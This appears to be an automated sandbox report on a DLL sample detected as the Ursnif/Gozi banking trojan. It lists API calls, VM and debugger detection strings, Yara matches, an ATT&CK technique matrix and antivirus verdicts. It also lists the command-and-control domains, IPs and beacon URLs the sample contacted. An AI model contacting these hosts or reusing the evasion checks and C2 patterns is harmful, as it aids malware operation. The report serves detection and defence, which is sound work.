                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E3C54C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072165C GetSystemInfo,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_007053C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E153C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: Amcache.hve.7.drBinary or memory string: VMware
                      Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.7.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                      Source: loaddll32.exe, 00000000.00000002.777216026.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772918664.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWve MAC Layer LightWeight Filter-0000
                      Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.7.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: loaddll32.exe, 00000000.00000002.777216026.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750087069.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772918664.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000007.00000002.314927336.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312790180.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312588018.0000000004A62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.7.drBinary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
                      Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

                      Anti Debugging

                      barindex
                      Found API chain indicative of debugger detection
                      Source: C:\Windows\SysWOW64\rundll32.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals,
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeMemory protected: page write copy | page execute and write copy | page guard
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetACP,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\loaddll32.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E19C14 GetLocalTime,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0070C10C GetVersionExA,
                      Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		31
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium3
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      System Shutdown/Reboot
                      Default Accounts11
                      Native API                      		Boot or Logon Initialization Scripts11
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory1
                      File and Directory Discovery                      		Remote Desktop Protocol1
                      Screen Capture                      		Exfiltration Over Bluetooth1
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
                      Obfuscated Files or Information                      		Security Account Manager116
                      System Information Discovery                      		SMB/Windows Admin Shares31
                      Input Capture                      		Automated Exfiltration3
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Software Packing                      		NTDS1
                      Query Registry                      		Distributed Component Object Model1
                      Clipboard Data                      		Scheduled Transfer13
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets231
                      Security Software Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common11
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials11
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                      Process Injection                      		DCSync11
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32                      		Proc Filesystem1
                      Remote System Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      hFGZpat9Mf.dll21%VirustotalBrowse
                      hFGZpat9Mf.dll33%ReversingLabsWin32.Infostealer.Gozi
                      hFGZpat9Mf.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.0.rundll32.exe.1080000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      0.2.loaddll32.exe.890184.1.unpack100%AviraTR/Kazy.4159236Download File
                      3.2.rundll32.exe.e10000.0.unpack100%AviraHEUR/AGEN.1108767Download File
                      3.0.rundll32.exe.ed0184.5.unpack100%AviraTR/Kazy.4159236Download File
                      0.2.loaddll32.exe.2500000.4.unpack100%AviraHEUR/AGEN.1108168Download File
                      3.0.rundll32.exe.ed0184.1.unpack100%AviraTR/Kazy.4159236Download File
                      3.2.rundll32.exe.1080000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      3.0.rundll32.exe.e10000.0.unpack100%AviraHEUR/AGEN.1108767Download File
                      0.2.loaddll32.exe.9e0000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      3.0.rundll32.exe.e10000.4.unpack100%AviraHEUR/AGEN.1108767Download File
                      3.0.rundll32.exe.1080000.7.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      3.2.rundll32.exe.ed0184.1.unpack100%AviraTR/Kazy.4159236Download File
                      0.2.loaddll32.exe.700000.0.unpack100%AviraHEUR/AGEN.1108767Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      giporedtrip.at12%VirustotalBrowse
                      habpfans.at12%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus0%VirustotalBrowse
                      http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus0%Avira URL Cloudsafe
                      http://31.214.157.187/drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk0%Avira URL Cloudsafe
                      http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk100%Avira URL Cloudmalware
                      http://giporedtrip.at/drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk100%Avira URL Cloudmalware
                      http://194.76.226.200/drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk0%Avira URL Cloudsafe
                      http://194.76.226.200/drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk0%Avira URL Cloudsafe
                      http://habpfans.at/100%Avira URL Cloudmalware
                      http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w100%Avira URL Cloudmalware
                      http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk0%Avira URL Cloudsafe
                      http://giporedtrip.at/drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk100%Avira URL Cloudmalware
                      http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM80%Avira URL Cloudsafe
                      http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk100%Avira URL Cloudmalware
                      http://31.214.157.187/0%Avira URL Cloudsafe
                      http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/100%Avira URL Cloudmalware
                      http://habpfans.at/g100%Avira URL Cloudmalware
                      http://194214.157.187/0%Avira URL Cloudsafe
                      http://www.dhtmlcentral.com/tutorial.asp0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      giporedtrip.at
                      		211.119.84.112
                      		truetrueunknown
                      habpfans.at
                      		41.41.255.235
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
